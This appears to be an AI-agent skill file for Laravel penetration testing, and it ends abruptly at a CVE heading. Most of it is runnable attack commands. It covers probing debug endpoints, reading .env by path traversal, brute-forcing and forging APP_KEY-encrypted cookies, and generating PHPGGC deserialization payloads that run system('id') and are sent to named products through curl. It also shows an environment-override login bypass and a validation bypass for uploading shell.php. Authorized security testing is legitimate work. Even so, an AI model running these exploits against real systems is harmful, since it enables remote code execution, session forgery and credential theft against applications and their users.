Hacktricks-skills laravel-pentest

Laravel application security testing and exploitation. Use this skill whenever the user mentions Laravel, PHP web application pentesting, APP_KEY exploitation, cookie decryption, deserialization attacks, or any Laravel-specific vulnerability research. This skill covers APP_KEY brute-forcing, cookie forgery, RCE via gadget chains, file upload bypasses, and environment override attacks.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/network-services-pentesting/pentesting-web/laravel/SKILL.MD

source content

Laravel Pentesting Skill

A comprehensive skill for testing Laravel applications for security vulnerabilities, including encryption weaknesses, deserialization attacks, and framework-specific CVEs.

When to Use This Skill

Use this skill when:

Testing a Laravel web application for security vulnerabilities
Need to decrypt/forge Laravel cookies or sessions
Investigating APP_KEY-related vulnerabilities
Exploiting Laravel deserialization vulnerabilities (CVE-2018-15133, CVE-2021-3129)
Testing for file upload validation bypasses (CVE-2025-27515)
Checking for environment override vulnerabilities (CVE-2024-52301)
Fingerprinting Laravel applications and exposed debug endpoints

Quick Start

1. Fingerprint the Target

First, confirm the target is running Laravel and identify exposed debug endpoints:

# Use the bundled fingerprinting script
./scripts/laravel_fingerprint.sh https://target.com

# Or manually check common endpoints
for p in _ignition/health-check _debugbar telescope horizon; do 
  curl -sk https://target/$p | head -n1
done

Look for:

```
XSRF-TOKEN
```
and
```
laravel_session
```
cookies
Blade error pages
Debug tooling endpoints
```
X-Powered-By
```
headers

2. Check for Debug Mode

Debug mode exposes sensitive information and enables additional attack vectors:

# Check for debug banners or verbose errors
curl -sk https://target/

# Force an error to see if debug page appears
curl -sk "https://target/nonexistent-route-xyz123"

If debug mode is enabled, you may see:

Stack traces with file paths
Environment variables
Database credentials
Reflected XSS in Whoops error pages (CVE-2024-13918/13919)

3. Extract APP_KEY

The APP_KEY is critical for most Laravel attacks. Try these methods:

Method A: Debug Page Disclosure If debug mode is on, the APP_KEY may be visible in error pages or stack traces.

Method B: .env File Access Try path traversal to access

.env

curl -sk "https://target/../../../.env"
curl -sk "https://target/.env"

Method C: Brute-Force from Cookies If you have encrypted cookies, use the bundled script or

laravel-crypto-killer

# Decrypt a captured cookie
python scripts/laravel_cookie_crypto.py decrypt -k <APP_KEY> -v <cookie_value>

# Brute-force with a wordlist
python scripts/laravel_cookie_crypto.py bruteforce -v <cookie_value> -kf appkeys.txt

APP_KEY Exploitation

Once you have the APP_KEY, you can forge cookies and sessions.

Decrypt/Encrypt Cookies

# Decrypt a cookie
python scripts/laravel_cookie_crypto.py decrypt -k "<APP_KEY>" -v "<cookie_value>"

# Encrypt custom data
python scripts/laravel_cookie_crypto.py encrypt -k "<APP_KEY>" -d '{"username":"admin","role":"superuser"}'

Generate RCE Payloads

Use PHPGGC gadget chains with the APP_KEY:

# Generate RCE payload for Laravel/RCE13
phpggc Laravel/RCE13 "system('id')" -b -f | \
  python scripts/laravel_cookie_crypto.py encrypt -k "<APP_KEY>" -v -

# For Laravel/RCE9 (older versions)
phpggc Laravel/RCE9 "system('id')" -b | \
  python scripts/laravel_cookie_crypto.py encrypt -k "<APP_KEY>" -v -

Real-World Exploitation Patterns

Invoice Ninja ≤v5 (CVE-2024-55555)

phpggc Laravel/RCE13 "system('id')" -b -f | \
  python scripts/laravel_cookie_crypto.py encrypt -k "<APP_KEY>" -v - | \
  xargs -I% curl "https://victim/route/%"

Snipe-IT ≤v6 (CVE-2024-48987)

phpggc Laravel/RCE9 "system('id')" -b | \
  python scripts/laravel_cookie_crypto.py encrypt -k "<APP_KEY>" -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login

Crater (CVE-2024-55556)

phpggc Laravel/RCE15 "system('id')" -b > payload.bin
python scripts/laravel_cookie_crypto.py encrypt -k "<APP_KEY>" -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login

CVE-2024-52301: Environment Override

When PHP's

register_argc_argv=On

, you can override the Laravel environment per-request:

# Check if override works
curl -sk "https://target/?--env=local"

# Bypass authentication if app trusts environment
POST /login?--env=preprod HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded

email=a@b.c&password=whatever&remember=0xdf

This works when:

```
register_argc_argv=On
```
in PHP configuration
Application has environment-gated logic (e.g.,
```
if (app()->environment('preprod'))
```
)
Vulnerable Laravel version that reads argv for HTTP requests

CVE-2025-27515: File Upload Bypass

Laravel 10.0–10.48.28, 11.0.0–11.44.0, 12.0.0–12.1.0 have wildcard validation bypass:

# Bypass file validation with crafted field names
curl -sk https://target/upload \
  -F 'files[0]=@ok.png;type=image/png' \
  -F 'files[0][__asterisk__payload]=@shell.php;type=text/plain' \
  -F 'description=lorem'

# Try variations
-F 'files[0][0]=@shell.php;type=text/plain'
-F 'files.__dot__0=@shell.php;type=text/plain'
-F 'files[0][uuid]=@shell.php;type=text/plain'

Detection:

# Static analysis
rg -n "files\\.\\*" -g"*.php" app/

# Check FormRequest classes for rules() with files.*

Ecosystem Package Vulnerabilities

CVE-2025-47275: Auth0-PHP CookieStore

Affects

auth0/auth0-php

< 8.14.0:

# Check if vulnerable
grep "auth0/auth0-php" composer.lock
grep "AUTH0_SESSION_STORAGE=cookie" .env

# If vulnerable, brute-force the GCM tag on auth0 cookie
# Modify JSON payload (sub, roles) and replay

CVE-2025-48490: lomkit/laravel-rest-api